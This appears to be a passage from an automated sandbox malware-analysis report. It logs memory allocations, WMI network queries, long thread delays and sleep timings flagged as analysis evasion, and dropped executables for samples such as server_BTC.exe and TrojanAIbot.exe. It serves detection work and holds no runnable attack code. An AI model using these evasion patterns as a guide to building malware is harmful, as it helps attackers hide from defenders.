                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 50F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 18E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3290000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 5290000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 12A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 1010000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2C40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2980000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: A60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 23B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 43B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2D80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 3000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2D80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: A40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2440000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 4440000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1400000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2F80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2D60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199936Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199727Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199968
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199670
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199498
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199073
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198713
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198561
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198403
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198228
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198099
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197943
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197780
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197650
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197541
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197429
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197315
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197190
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197077
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196967
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196858
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196748
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196639
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196529
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196346
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196101
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195982
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195872
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195765
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195654
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195546
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195435
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195326
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195218
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195105
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194999
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194886
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194780
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194671
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199953
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199843
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199734
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199625
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199515
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199406
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199296
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199187
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3681Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4211Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7004
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1214
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 5282
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 4506
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 5096
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4640
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3990
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 5814
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI coverage: 9.5 %
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -200000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7248Thread sleep count: 3681 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99859s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99730s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99622s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99474s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7248Thread sleep count: 4211 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99149s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98921s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98697s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98468s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98358s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98249s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98140s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98030s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97921s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97811s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97697s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97582s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97085s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -96969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -96852s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99778s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99662s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99418s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99305s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99198s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -99078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98949s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98829s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98714s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98595s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98458s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98331s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -98087s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97840s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97276s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -97134s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -1199936s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244Thread sleep time: -1199727s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 2848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884Thread sleep count: 7004 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep count: 1214 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3768Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7204Thread sleep time: -316920000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7204Thread sleep time: -270360000s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 5388Thread sleep count: 43 > 30
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7228Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99866s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99745s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99623s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99394s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99138s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98961s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98831s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98708s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98580s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98452s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98339s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98227s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98116s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97975s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97848s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97712s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -195200s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97490s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99888s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99776s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99634s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -99301s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98802s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98606s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98475s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98258s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -98120s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97972s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97845s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97717s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -97457s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1199968s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1199670s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1199498s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1199073s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1198713s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1198561s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1198403s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1198228s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1198099s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197943s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197780s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197650s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197541s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197429s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197315s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197190s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1197077s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1196967s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1196858s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1196748s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1196639s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1196529s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1196346s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1196101s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195982s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195872s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195654s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195546s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195435s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195326s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1195105s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1194999s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1194886s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1194780s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712Thread sleep time: -1194671s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep count: 36 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -33204139332677172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7992Thread sleep count: 3990 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99856s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99712s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99584s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99457s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99341s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7992Thread sleep count: 5814 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99233s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99120s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99006s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98882s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98773s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98662s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98538s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98427s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98304s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98023s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97911s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97788s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97678s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97554s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97443s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99763s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99544s >= -30000s
